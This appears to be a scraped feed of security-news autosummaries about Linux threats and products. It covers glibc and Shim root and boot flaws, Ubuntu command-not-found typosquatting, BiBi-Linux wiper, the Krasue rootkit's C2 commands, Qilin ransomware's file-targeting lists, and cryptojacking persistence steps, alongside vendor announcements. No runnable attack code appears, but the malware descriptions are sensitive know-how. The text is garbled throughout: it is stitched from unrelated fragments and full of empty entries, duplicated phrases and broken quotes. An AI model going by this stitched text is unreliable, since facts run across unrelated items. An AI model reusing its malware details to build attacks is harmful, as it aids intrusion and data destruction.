Major Linux distributions such as Debian (1, 2), Red Hat (1), SUSE (1, 2), and Ubuntu (1, 2) have released advisories for the two flaws. "Autosummary:
In an alert published yesterday, web infrastructure company Akamai said it has observed "significant scanning activity" targeting CVE-2024-22024 starting February 9, 2024, following the publication of a proof-of-concept (PoC) by watchTowr. "Autosummary:
The first and most simple trick is to associate commands containing typing errors (e.g., "ifconfigg" instead of "ifconfig") with malicious snap packages, leading the "command-not-found" utility to suggest the installation of malware to the user, who is unlikely to realize their typo at that point. Typo-squatting and impersonation risks All the above lays the ground for a risky situation as long as attackers find a way to promote their packages through the "command-not-found" utility, but as the analysts explain, there"s a comfortable margin for that, too. "Autosummary:
"This oversight left a window of opportunity for an attacker to claim it and upload a malicious snap named "jupyter-notebook."" To make matters worse, the command-not-found utility suggests the snap package above the legitimate APT package for jupyter-notebook, misleading users into installing the fake snap package. "Autosummary:
Abusing the Ubuntu ‘command-not-found’ utility to install malicious packages Pierluigi Paganini February 14, 2024 February 14, 2024 Researchers reported that attackers can exploit the ‘command-not-found’ utility to trick users into installing rogue packages on Ubuntu systems. "Autosummary:
"Though there are organizations out there investigating how commercial spyware is misused to target journalists, human rights defenders and dissidents, the growing market related to the development and sale of this type of software and the exploits used to deploy it is still very much shrouded in mystery. “While prominent [commercial spyware vendors] garner public attention and headlines, there are dozens of others that are less noticed, but play an important role in developing spyware,” … More
The post The fight against commercial spyware misuse is heating up appeared first on Help Net Security.
"Autosummary:
In related news, on Monday, US Secretary of State Antony Blinken announced that the State Department is implementing a new policy that will allow the imposition of visa restrictions on: Individuals involved in the misuse of commercial spyware to surveil, harass, or intimidate “journalists, activists, other persons perceived to be dissidents for their work, members of marginalized communities or vulnerable populations, or the family members of these targeted individuals” Individuals believed to facilitate or derive financial benefit from such misuse of commercial spyware (e.g., commercial spyware vendors, and brokers) "Autosummary:
Linux distributions that utilize Shim, such as Red Hat, Debian, Ubuntu, and SUSE, have released advisories with information on the flaw. "Autosummary:
"Autosummary:
found a critical bug that exists in every Linux boot loader signed in the past decade 🥰 https://t.co/kjATsR4uvJ https://t.co/JrECpgGmWD pic.twitter.com/oKEl7PTUSp — Bill Demirkapi (@BillDemirkapi) January 24, 2024 “Discovered and reported by Bill Demirkapi at Microsoft’s Security Response Center, this particular vulnerability stems from HTTP protocol handling, leading to an out-of-bounds write that can lead to complete system compromise.” "IBM announced IBM LinuxONE 4 Express, extending the latest performance, security and AI capabilities of LinuxONE to small and medium sized businesses and within new data center environments. The pre-configured rack mount system is designed to offer cost savings and to remove client guess work when spinning up workloads quickly and getting started with the platform to address new and traditional use cases such as digital assets, medical imaging with AI, and workload consolidation. Building … More
The post IBM LinuxONE 4 Express protects sensitive private data appeared first on Help Net Security.
"Autosummary:
Activating the IBM Ecosystem for client success With the IBM LinuxONE Ecosystem, including AquaSecurity, Clari5, Exponential AI, Opollo Technologies, Pennant and Spiking, IBM is working to provide solutions for today’s sustainability and cybersecurity challenges.IBM brings the power of hybrid cloud and AI in the latest LinuxONE 4 system to a simple, easy to use format that fits in many data centers,” said Tina Tarquinio, VP, Product Management, IBM Z and LinuxONE. "Autosummary:
However, the sudo settings provide some clues as to how the command will work, with the ability to run sudo applications "In a new windows", "With input disabled", and "Inline". "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Root access vulnerability in GNU Library C (glibc) impacts many Linux distros Pierluigi Paganini January 30, 2024 January 30, 2024 Qualys researchers discovered a root access flaw, tracked as CVE-2023-6246, in GNU Library C (glibc) affecting multiple Linux distributions. "Tsurugi Linux is a heavily customized open-source distribution focused on supporting DFIR investigations. The project focuses mainly on live forensics analysis, post-mortem analysis, and digital evidence acquisition. Users can also perform malware analysis, OSINT and computer vision activities. “We’ve crafted a user-friendly experience, organizing the main menu in a logical forensic analysis sequence. Our menu is your roadmap from device acquisition to integrity checks, artifact extraction, and reporting tools. It’s not just about familiarity; it’s … More
The post Tsurugi Linux: Tailoring user experience for digital forensics and OSINT investigations appeared first on Help Net Security.
"Autosummary:
And for the seasoned experts, every tool is at your fingertips, ready to be wielded precisely through the command line console,” Giovanni Rattaro, Tsurugi Linux core developer, told Help Net Security. "AuthLogParser is an open-source tool tailored for digital forensics and incident response, specifically crafted to analyze Linux authentication logs (auth.log). The tool examines the auth.log file, extracting crucial details like SSH logins, user creations, event names, IP addresses, among others. It produces a concise summary that offers a clear overview of the activities documented in the authentication logs, presenting the information in a format that is easy to read. AuthLogParser features “AuthLogParser’s distinctiveness lies in … More
The post AuthLogParser: Open-source tool for analyzing Linux authentication logs appeared first on Help Net Security.
"Autosummary:
Users groups activity events Successful SSH Password Authentication Successful SSH Public key Authentication New User Creation Activity User Deletion Activity User Password Change Activity New Group Creation Activity Group Deletion Activity User Added To A Group Activity User Removed From A Group Activity Session Opened For User root General activity events Machine Shutdown By Power Button Future plans In forthcoming iterations, the creator wants to elevate AuthLogParser beyond its initial success as a proof of concept. "Autosummary:
"Autosummary:
"Autosummary:
Experts analyzed attacks against poorly managed Linux SSH servers Pierluigi Paganini December 27, 2023 December 27, 2023 Researchers warn of attacks against poorly managed Linux SSH servers that mainly aim at installing DDoS bot and CoinMiner. "Autosummary:
"In some cases, the final payload is a variant of the infamous W4SP Stealer, or a simple clipboard monitor to steal cryptocurrency, or both," ESET researchers Marc-Etienne M.Léveillé and Rene Holt said in a report published earlier this week. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Advanced ransomware campaigns expose need for AI-powered cyber defense In this Help Net Security interview, Carl Froggett, CIO at Deep Instinct, discusses emerging trends in ransomware attacks, emphasizing the need for businesses to use advanced AI technologies, such as deep learning (DL), for prevention rather than just detection and response. SessionProbe: Open-source multi-threaded pentesting tool SessionProbe is a multi-threaded pentesting … More
The post Week in review: Booking.com hotel booking scam, Kali Linux 2023.4 released appeared first on Help Net Security.
"Autosummary:
Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Advanced ransomware campaigns expose need for AI-powered cyber defense In this Help Net Security interview, Carl Froggett, CIO at Deep Instinct, discusses emerging trends in ransomware attacks, emphasizing the need for businesses to use advanced AI technologies, such as deep learning (DL), for prevention rather than just detection and response. New infosec products of the week: December 8, 2023 Here’s a look at the most interesting products from the past week, featuring releases from Atsign, Daon, Global Integrity, Living Security, Panther Labs, Searchlight Cyber, and Varonis. "Autosummary:
"Autosummary:
"Autosummary:
Threat actors could propagate the threat by exploiting vulnerabilities in Internet-facing systems, conducting credential brute force attacks, and tricking victims into downloading deceptive packages or binaries (i.e., files masquerading as product updates) from untrustworthy third-party sources. "Autosummary:
When communicating with the command and control (C2) server, Krasue can accept the following commands: ping – Reply with `pong` – Reply with `pong` master – Set the master upstream C2 – Set the master upstream C2 info – Get information about the malware: main pid, child pid, and its status such as “root: gained root permissions,” “god: process is unable to be killed,” “hidden: process is hidden,” “module: rootkit is loaded” – Get information about the malware: main pid, child pid, and its status such as “root: gained root permissions,” “god: process is unable to be killed,” “hidden: process is hidden,” “module: rootkit is loaded” restart – Restart child process – Restart child process respawn – Restart main process – Restart main process god die – Kill itself Group-IB discovered nine distinct C2 IP addresses hardcoded into the malware, with one using port 554, which is common in RTSP (Real Time Streaming Protocol) connections. "Autosummary:
Below are the fifteen new tools added in Kali 2023.4: cabby - TAXII client implementation cti-taxii-client - TAXII 2 client library enum4linux-ng - Next generation version of enum4linux with additional features (a Windows/Samba enumeration tool) exiflooter - Finds geolocation on all image URLs and directories h8mail - Email OSINT & Password breach hunting tool Havoc - Modern and malleable post-exploitation command and control framework OpenTAXII - TAXII server implementation PassDetective - Scans shell command history to detect mistakenly written passwords, API keys, and secrets Portspoof - All 65535 TCP ports are always open & emulates services Raven - Lightweight HTTP file upload service ReconSpider - Most Advanced Open Source Intelligence (OSINT) Framework "OffSec (previously Offensive Security) has released Kali Linux 2023.4, the latest version of its penetration testing and digital forensics platform. New tools in Kali Linux 2023.4 The list of tools freshly added to Kali Linux includes: cabby – a TAXII client implementation cti-taxii-client – a TAXII 2 client library enum4linux-ng – Next generation version of enum4linux with additional features (a Windows/Samba enumeration tool) exiflooter – Finds geolocation info on all image URLs and directories h8mail … More
The post Kali Linux 2023.4 released: New tools, Kali for Raspberry Pi 5, and more! appeared first on Help Net Security.
"Autosummary:
"Autosummary:
In the sample analyzed by BleepingComputer.com, the encryptor is configured by default with the following exclusions and targeting criteria: Processes to not terminate: "kvm", "qemu", "xen" Directories to exclude from encryption: "/boot/", "/proc/", "/sys/", "/run/", "/dev/", "/lib/", "/etc/", "/bin/", "/mbr/", "/lib64/", "/vmware/lifecycle/", "/vdtc/", "/healthd/" Files to exclude from encryption: "initrd", "vmlinuz", "basemisc.tgz", "boot.cfg", "bootpart.gz", "features.gz", "imgdb.tgz", "jumpstrt.gz", "onetime.tgz", "state.tgz", "useropts.gz" File extensions to exclude from encryption: "v00", "v01", "v02", "v03", "v04", "v05", "v06", "v07", "v08", "v09", "b00", "b01", "b02", "b03", "b04", "b05", "b06", "b07", "b08", "b09", "t00", "t01", "t02", "t03", "t04", "t05", "t06", "t07", "t08", "t09" Directories to target for encryption: "/home", "/usr/home", "/tmp", "/var/www", "/usr/local/www", "/mnt", "/media", "/srv", "/data", "/backup", "/var/lib/mysql", "/var/mail", "/var/spool/mail", "/var/vm", "/var/lib/vmware", "/opt/virtualbox", "/var/lib/xen", "/var/opt/xen", "/kvm", "/var/lib/docker", "/var/lib/libvirt", "/var/run/sr-mount", "/var/lib/postgresql", "/var/lib/redis", "/var/lib/mongodb", "/var/lib/couchdb", "/var/lib/neo4j", "/var/lib/cassandra", "/var/lib/riak", "/var/lib/influxdb", "/var/lib/elasticsearch" Files to target for encryption: "3ds", "3g2", "3gp", "7z", "aac", "abw", "ac3", "accdb", "ai", "aif", "aiff", "amr", "apk", "app", "asf", "asx", "atom", "avi", "bak", "bat", "bmp", "bup", "bz2", "cab", "cbr", "cbz", "cda", "cdr", "chm", "class", "cmd", "conf", "cow", "cpp", "cr2", "crdownload", "cs", "csv", "cue", "cur", "dat", "db", "dbf", "dds", "deb", "der", "desktop", "dmg", "dng", "doc", "docm", "dot", "dotm", "dotx", "dpx", "drv", "dtd", "dvi", "dwg", "dxf", "eml", "eps", "epub", "f4v", "fnt", "fon", "gam", "ged", "gif", "gpx", "gz", "h264", "hdr", "hpp", "hqx", "htm", "html", "ibooks", "ico", "ics", "iff", "image", "img", "indd", "iso", "jar", "java", "jfif", "jpe", "jpeg", "jpf", "jpg", "js", "json", "jsp", "key", "kml", "kmz", "log", "m4a", "m4b", "m4p", "m4v", "mcd", "mdbx", "mht", "mid", "mkv", "ml", "mobi", "mov", "mp3", "mp4", "mpa", "mpeg", "mpg", "msg", "nes", "numbers", "odp", "ods", "odt", "ogg", "ogv", "otf", "ova", "ovf", "pages", "parallels", "pcast", "pct", "pdb", "pdf", "pds", "pef", "php", "pkg", "pl", "plist", "png", "pptm", "prproj", "ps", "psd", "ptx", "py", "qcow", "qcow2", "qed", "qt", "r3d", "ra", "rar", "rm", "rmvb", "rtf", "rv", "rw2", "sh", "shtml", "sit", "sitx", "sketch", "spx", "sql", "srt", "svg", "swf", "tar", "tga", "tgz", "thmx", "tif", "tiff", "torrent", "ttf", "txt", "url", "vdi", "vhd", "vhdx", "vmdk", "vmem", "vob", "vswp", "vvfat", "wav", "wbmp", "webm", "webp", "wm", "wma", "wmv", "wpd", "wps", "xhtml", "xlsm", "xml", "xspf", "xvid", "yaml", "yml", "zip", "zipx" Configuring a list of virtual machines that should not be encrypted is also possible. The Qilin ransomware operation The Qilin ransomware operation was initially launched as "Agenda" in August 2022. "Canonical announced chiselled Ubuntu containers which come with Canonical’s security maintenance and support commitment. Chiselled Ubuntu containers are ultra-small OCI images that deliver only the application and its runtime dependencies, and no other operating system-level packages, utilities, or libraries. This makes them lightweight to maintain and operate, secure, and efficient in resource utilisation. Canonical’s chiselled Ubuntu portfolio includes pre-built images for popular toolchains like Java, .NET and Python. The company has been working closely with … More
The post Chiselled Ubuntu closes prevailing container security gaps appeared first on Help Net Security.
"Autosummary:
Key benefits include: Bug-for-bug compatibility of containers and their contents from Developer experience through DevOps and DevSecOps to production, as all the containers are built from the same package contents Smaller containers means fewer dependency headaches across the container CI lifecycle Chisel CLI for an easy, Ubuntu-like experience as customers build or extend chiselled containers themselves using the same tools as Canonical Simple images means simpler image rebuilds Reliable support and release cadence Chiselled Ubuntu images inherit Ubuntu’s long-term support guarantees and are updated within the same release cycle using the self-same packages as within other LTS components. Trusted provenance, optimal developer experience According to GitLab’s 2022 Global DevSecOps Survey, only 64% of security professionals had a security plan for containers, and many DevOps teams don’t have a plan in place for other cutting-edge software technologies, including cloud-native/serverless, APIs, and microservices. "Autosummary:
“We have successfully identified and exploited this vulnerability (a local privilege escalation that grants full root privileges) on the default installations of Fedora 37 and 38, Ubuntu 22.04 and 23.04, and Debian 12 and 13.” reads the post published by Qualys. "Autosummary:
"Autosummary:
"With the capability to provide full root access on popular platforms like Fedora, Ubuntu, and Debian, it"s imperative for system administrators to act swiftly," Qualys" Saeed Abbasi warned. "Autosummary:
"Autosummary:
BiBi"s commands stored in reverse writing order to evade detection (BlackBerry) BiBi for Windows targets all file types except for .EXE, .DLL, and .SYS files, likely because destroying them would render the computer unusable, and the hacktivists wouldn"t be able to relay their message. "Cloud computing carries many benefits for your business… as long as you can ensure the performance and availability of your cloud environments. Let’s take the following three cloud computing benefits as examples. Rapidly scale cloud services: In the absence of performance and availability, you can’t reliably scale your cloud computing services to fit your needs. This means that your organization could miss out on taking advantage of certain resources, or it might need to pay … More
The post Uphold Linux systems’ performance and availability in Azure appeared first on Help Net Security.
"Autosummary:
With this testing period over, Azure Monitor Agent is now validated for successful deployment and overall functionality (e2e data flow for all data types) on images for the following CIS Benchmarks: CIS Red Hat Enterprise Linux 7 Benchmark Level 1 CIS Red Hat Enterprise Linux 7 Benchmark Level 2 CIS Red Hat Enterprise Linux 8 Benchmark Level 1 CIS Red Hat Enterprise Linux 8 Benchmark Level 2 CIS Ubuntu Linux 20.04 LTS Benchmark Level 1 CIS CentOSLinux 7 Benchmark Level 1 CIS Debian Linux 10 Benchmark Level 1 CIS Oracle Linux 8 Benchmark Level 1 What’s more, the Azure team has integrated CIS Hardened Images into the pre-release validation process for continual re-validation when new AMA versions become available. "SUSE released Rancher Prime 2.0, enhancing customers’ ability to manage heterogeneous, multi-cloud Kubernetes deployments securely and at scale. SUSE also revealed updates to Rancher community edition, SLE Micro 5.5 and the future of SUSE Edge. The latest updates continue to meet the diverse needs of the developer while furthering SUSE’s mission to provide choice. “With Rancher Prime we continue our focus on enhancing customer productivity by providing a simple and secure container management experience for … More
The post SUSE boosts cloud native portfolio to enhance customer productivity appeared first on Help Net Security.
"Autosummary:
“With Rancher Prime we continue our focus on enhancing customer productivity by providing a simple and secure container management experience for their entire infrastructure including data center, multiple clouds, and the Edge,” said Peter Smails, general manager of Enterprise Container Management, SUSE. Helping customers get more value from Kubernetes with Rancher Prime 2.0 Interoperable by design, Rancher Prime 2.0, SUSE’s commercial enterprise subscription, delivers even more value and support for customers: Tighter portfolio integration and new UI extensions (UIE): UI extensions simplify operations and enhance user productivity by building in the functionality of SUSE and third-party tools directly into the Rancher Prime UI. "Autosummary:
CVE-2017-9841 exploitation (AquaSec) Exploiting the PHPUnit flaw (CVE-2017-9841) leads to opening a reverse shell over port 1337 on the compromised system, which Kinsing operators leverage to execute reconnaissance commands like "uname -a" and "passwrd." "Autosummary:
"A pro-Hamas hacker group is targeting Israeli entities using a new Linux-based wiper malware dubbed BiBi-Linux Wiper. During a forensics investigation, Security Joes Incident Response team discovered a new Linux Wiper malware they tracked as BiBi-Linux Wiper. Pro-Hamas hacktivist group used the wiper to destroy the infrastructure of Israeli companies. The researchers noticed that the malware […]
The post Pro-Hamas hacktivist group targets Israel with BiBi-Linux wiper appeared first on Security Affairs.
"Autosummary:
Pro-Hamas hacktivist group targets Israel with BiBi-Linux wiper Pierluigi Paganini November 01, 2023 November 01, 2023 A pro-Hamas hacker group is targeting Israeli entities using a new Linux-based wiper malware dubbed BiBi-Linux Wiper. "Attackers have started using new wiper malware called BiBi-Linux to attack Israeli companies and destroy their data. The BiBi-Linux wiper The Security Joes Incident Response team found the malware during a forensics investigation of a breach within an Israeli company. “This malware is an x64 ELF executable, lacking obfuscation or protective measures. It allows attackers to specify target folders and can potentially destroy an entire operating system if run with root permissions,” Security Joes researchers … More
The post BiBi-Linux wiper targets Israeli companies appeared first on Help Net Security.
"Autosummary:
“During execution, it produces extensive [terminal] output, which can be mitigated using the ‘nohup’ command. "Autosummary:
The malware reveals its true nature by not dropping a ransom note or providing victims with a way to reach out to the attackers to negotiate payment for a decryptor, even though it fakes file encryption, "This new threat does not establish communication with remote Command & Control (C2) servers for data exfiltration, employ reversible encryption algorithms, or leave ransom notes as a means to coerce victims into making payments," said Security Joes. "Autosummary:
After investigating the injected code, they determined it downloads and executes additional files, such as PowerShell scripts, from legitimate hosting services like Bitbucket, GitHub, and GitLab, including PowerShell scripts.It achieves persistence using systemd services, an autostarting .desktop file, or by modifying various profile and startup files, such as /etc/rc*, profile, bashrc, or inittab files. "The malware payload encompasses multiple modules, enabling the actor to perform as an APT, as a crypto miner, and even as a ransomware group," reads Kaspersky"s report. "Autosummary:
These scripts are listed below: Structure of the image"s filesystem Source: Unit 42 The "controller" uses the bundled configuration file, which provides access tokens, victim credentials, and authentication secrets, as well as configuration directives, folder and file blocklists, tasks to run, and hosts to target for encryption. "Autosummary:
The script is responsible for most of the malicious activity on a compromised Linux server, including the following: Download and run an XMRig miner disguised as "python-dev" Set up four cron jobs (apache2, apache2.2, netns, netns2) for the miner"s and script"s persistence Insert an attacker-controlled SSH key for persistent root access Install the "Diamorphine" LKM (loadable kernel module) rootkit that helps hide specific processes from monitoring tools Steal credentials from the breached endpoint and spread via SSH Cado reports that mi.sh also performs some attack-optimization steps using an additional component named "kthreadd," such as detecting competing miners in the list of running processes and killing them and using the "netstat" utility to shut connections to IPs flagged for cryptojacking. "Autosummary:
Furthermore, dependencies, code, and open source components may undergo a separate validation process, aimed at thwarting malware, than the one suited for translations, making incidents like these harder to discover. "I trust Ubuntu because it"s the most widely used so it should have the best review team, but if this happened with translations and no one saw, imagine with dependencies with malware injected," posted a user on X (formerly Twitter). "Autosummary:
The list of devices impacted by the two zero-day bugs is extensive, and it includes: iPhone 8 and later iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later CISA added the two vulnerabilities [1, 2] to its Known Exploited Vulnerabilities Catalog last week, ordering federal agencies to secure their devices against incoming attacks. "TuxCare has unveiled the addition of a new Extended Security Update (ESU) service for its Enterprise Support Service line up for AlmaLinux OS. The new ESU service enhances TuxCare’s comprehensive service portfolio for AlmaLinux OS, enabling organizations to achieve greater stability and predictability for their AlmaLinux systems. All services in the portfolio, including the newly announced ESU service as well as Essential Support, Live Patching, and Enhanced Support, are now offered to customers as a … More
The post TuxCare adds ESU service for stability and predictability in AlmaLinux systems appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"Vulnerabilities like this are often the starting point for a "one-click" exploit, which compromise the victim"s device when they visit a malicious website," security researcher Man Yue Mo said. "Autosummary:
" While successful exploitation of CVE-2023-43641 requires tricking a potential victim into downloading a .cue file, admins are advised to patch systems and mitigate the risks posed by this security flaw, as it provides code execution on devices running the latest releases of widely used Linux distros, including Debian, Fedora, and Ubuntu. "A vulnerability (CVE-2023-4911) in the GNU C Library (aka “glibc”) can be exploited by attackers to gain root privileges on many popular Linux distributions, according to Qualys researchers. About CVE-2023-4911 Dubbed “Looney Tunables”, CVE-2023-4911 is a buffer overflow vulnerability in the dynamic loader’s processing of the GLIBC_TUNABLES environment variable. To exploit it, attackers first need to establish access to the system. “The GNU C Library, commonly known as glibc, is the C library in the … More
The post “Looney Tunables” bug allows root access on Linux distros (CVE-2023-4911) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Our successful exploitation, leading to full root privileges on major distributions like Fedora, Ubuntu, and Debian, highlights this vulnerability’s severity and widespread nature," said Saeed Abbasi, Product Manager at Qualys" Threat Research Unit. "